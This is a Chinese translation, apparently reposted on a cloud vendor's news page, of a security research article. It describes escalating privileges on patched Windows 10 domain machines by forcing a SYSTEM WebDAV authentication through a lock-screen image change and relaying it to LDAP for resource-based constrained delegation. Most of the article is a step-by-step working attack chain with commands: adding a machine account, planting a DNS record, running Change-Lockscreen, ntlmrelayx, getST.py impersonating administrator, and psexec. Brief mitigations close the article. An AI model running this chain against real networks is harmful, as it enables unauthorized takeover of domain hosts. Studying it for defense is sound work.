您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何在滿補(bǔ)丁的Win10域主機(jī)上繞過圖形接口依賴實(shí)現(xiàn)本地提權(quán),內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細(xì)介紹希望你能有所收獲。
小編的目的是向大家展示,如何在打滿補(bǔ)丁的Win10域主機(jī)上繞過圖形接口依賴實(shí)現(xiàn)本地提權(quán)。你可能已經(jīng)注意到了[1],這種攻擊并不新鮮,但我們已經(jīng)刪除了它的一些依賴項(xiàng),同時(shí)我們也已自動化了該過程,以簡化我們的操作過程。
截至本文撰寫,攻擊者仍需滿足以下條件,才能使用此技術(shù)妥協(xié)Active Directory計(jì)算機(jī)對象:
具有至少一個ServicePrincipalName (SPN)的帳戶。此帳戶將被配置為受害者系統(tǒng)上的“允許代表其他身份(Allowed To Act On Behalf Of Other Identity)”,并將用于調(diào)用S4U2self和S4U2proxy協(xié)議。
必須在受害計(jì)算機(jī)上安裝WebDAV Redirector功能。這是因?yàn)閃ebDAV客戶端不協(xié)商簽名,因此允許身份驗(yàn)證中繼到LDAP。
SMB中繼可以使用最近發(fā)現(xiàn)的signing/MIC NTLM繞過來實(shí)現(xiàn),但這已被微軟修復(fù)了。[6] [7]
指向攻擊者計(jì)算機(jī)的DNS記錄。WebDAV客戶端將僅自動向Intranet區(qū)域中的主機(jī)進(jìn)行身份驗(yàn)證。這意味著使用IP而非主機(jī)名是行不通的。
訪問GUI以使用“Create your picture --> Browse for one”功能。其中一個步驟是由System(因此,計(jì)算機(jī)帳戶在網(wǎng)絡(luò)中)完成的,并且可以指定WebDAV路徑(\\maliciousWebDav@80\pics\pic.jpg)
以下信息對嘗試滿足上述依賴非常有用:
1. 默認(rèn)的Active Directory ms-DS-MachineAccountQuota屬性,允許所有域用戶向域中添加最多10個計(jì)算機(jī)帳戶[4]。另外,計(jì)算機(jī)帳戶具有其SPN屬性的值,因此允許使用S4U協(xié)議。
2. 在Windows 10上,默認(rèn)情況下已安裝WebDAV客戶端。在Windows Server 2012R2及更早版本中,需要桌面體驗(yàn)功能(Desktop Experience feature )。 在Windows Server 2016及更高版本上,必須手動安裝WebDAV Redirector 功能。
3. 默認(rèn)情況下,經(jīng)過身份驗(yàn)證的用戶在Active Directory集成DNS(ADIDNS)區(qū)域中,具有“創(chuàng)建所有子對象”ACL。這樣可以創(chuàng)建新的DNS記錄。
前三個條件很容易滿足,因?yàn)樗鼈兇砹四J(rèn)的Active Directory和Windows配置。但是,GUI的依賴在我們的場景中著實(shí)是一個令人感到沮喪的限制。
作為第一種方法,我們研究了使用API或Windows命令實(shí)用程序來更改配置文件圖像 - 但并沒有成功。然而,我們發(fā)現(xiàn)了通過對鎖屏圖像的操作可以暴露出相同的攻擊路徑。
以下截圖說明了這一點(diǎn)。
注意:在發(fā)表這篇文章前幾天,Elad Shamir發(fā)表文章稱他還發(fā)現(xiàn)了這個鎖屏圖像攻擊路徑。有關(guān)他的研究可以在[12]中找到。
在研究鎖屏圖像功能時(shí),我們發(fā)現(xiàn)在本例中,可以使用API來執(zhí)行鎖屏圖像更改[3]。使用這個API,我們最終通過命令行實(shí)現(xiàn)了SYSTEM網(wǎng)絡(luò)身份驗(yàn)證。
編寫PowerShell腳本和C#程序集以利用此API。我們調(diào)用了實(shí)用程序Change-Lockscreen,它可以在以下鏈接中找到:
https://github.com/nccgroup/Change-Lockscreen
使用此工具,指示提供圖像的WebDAV的路徑,Change-Lockscreen將執(zhí)行導(dǎo)致所需網(wǎng)絡(luò)身份驗(yàn)證的操作。
請注意,默認(rèn)情況下,Windows 10具有一個名為Windows Spotlight的功能。此功能會自動下載并顯示鎖屏圖像。啟用此功能后,Change-Lockscreen將禁用它,并建立參數(shù)中指定的圖像(嘗試使用opsec)。但是,如果用戶設(shè)置了一個靜態(tài)的、自定義的鎖屏圖像而不是使用Spotlight,則Change-Lockscreen將備份該圖像,并在攻擊完成后將其放回原位。
最初,我們使用3xocyte(與Elad Shamir合作)開發(fā)的rbcd_relay.py委托中繼工具[5]。雖然這在我們的一些測試場景中非常有用,但它并沒有涵蓋我們所需的一切。因此,我們決定通過執(zhí)行pull請求,在3xcely的工作和SecureAuth的Impacket項(xiàng)目[13]中添加我們自己的內(nèi)容。
我們向ntlmrelayx添加了一個名為--serve-image的新標(biāo)志。使用此標(biāo)志,ntlmrelayx將提供指定的圖像以滿足攻擊的目的。
此外,為了利用WebDAV的服務(wù)器功能,有必要在httprelayserver.py中實(shí)現(xiàn)OPTIONS和PROPFIND方法。OPTIONS方法用于通知客戶端支持并啟用PROPFIND方法。它是PROPFIND請求,其中包括NTLM身份驗(yàn)證,因此這個請求將被中繼以執(zhí)行攻擊(示例請求如下圖所示)。
示例用法如下:
ntlmrelayx.py -t ldap://dc01.capsule.corp --delegate-access --escalate-user machine$ --serve-image ./spot.jpg
這些功能已經(jīng)在Impacket中合并,你可以在以下位置找到:
https://github.com/SecureAuthCorp/impacket
以下是有關(guān)使用Change-Lockscreen和ntlmrelayx攻擊的視頻演示:
以下步驟對應(yīng)于上述視頻內(nèi)容:
1. 我們需要一個具有ServicePrincipalName屬性值的帳戶,才能調(diào)用S4U2Self和S4U2Proxy。我們可以濫用默認(rèn)的Active Directory ms-DS-MachineAccountQuota屬性,將計(jì)算機(jī)帳戶添加到域中并使用它(Powermad [11])。
$pass = ConvertTo-SecureString ‘NCC1234!’ -AsPlainText -Force ; New-MachineAccount –MachineAccount s4umachine -Password $pass
2. 我們必須創(chuàng)建一個指向攻擊者機(jī)器(攻擊者IP)的DNS記錄(ImageServer.capsule.corp)。
$cred = New-Object System.Management.Automation.PSCredential (“CAPSULE\s4umachine”, $pass); Invoke-DNSUpdate -DNSType A -DNSName ImageServer.capsule.corp -DNSData 10.10.11.137 -Credential $cred -Realm capsule.corp
3. 我們通過使用low-priv用戶來更改鎖屏圖像來觸發(fā)Fileserver的網(wǎng)絡(luò)身份驗(yàn)證。
Change-Lockscreen –Webdav \\imageserver@80\
4. 使用ntlmrelayx,身份驗(yàn)證將中繼到LDAP。這允許我們修改機(jī)器的msDS-AllowedToActOnBehalfOfOtherIdentity屬性。
Ntlmrelayx.py -t ldap://dc01.capsule.corp --delegate-access --escalate-user s4umachine$ --serve-image ./spot.jpg
5. 現(xiàn)在,我們可以使用受信任的計(jì)算機(jī)(S4UMachine$)模擬文件服務(wù)器上任意服務(wù)的任意用戶。
getST.py capsule\s4umachine:’NCC1234!’@fileserver.capsule.corp -spn cifs/fileserver.capsule.corp -impersonate administrator -dc-ip 10.10.11.128 Export KRB5CCNAME=administrator.ccache Psexec.py -k -no-pass fileserver.capsule.corp
以下短視頻以圖形、概念化的方式向大家展示了攻擊中涉及的各個步驟。
以下幾點(diǎn)有助于緩解和檢測此類攻擊:
由于此攻擊依賴于能夠?yàn)樽陨砼渲没贙erberos資源的約束委派的計(jì)算機(jī),因此拒絕自己寫入msDS-AllowedToActOnBehalfOfOtherIdentity屬性的計(jì)算機(jī)上的新ACE,將有助于緩解此攻擊面。
對msDS-AllowedToActOnBehalfOfOtherIdentity屬性,實(shí)施適當(dāng)?shù)腟ACL將有助于檢測對此功能的修改。
最后,通過channel綁定啟用LDAP簽名,可以緩解使用此攻擊執(zhí)行的身份驗(yàn)證中繼。
上述內(nèi)容就是如何在滿補(bǔ)丁的Win10域主機(jī)上繞過圖形接口依賴實(shí)現(xiàn)本地提權(quán),你們學(xué)到知識或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識儲備,歡迎關(guān)注億速云行業(yè)資訊頻道。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。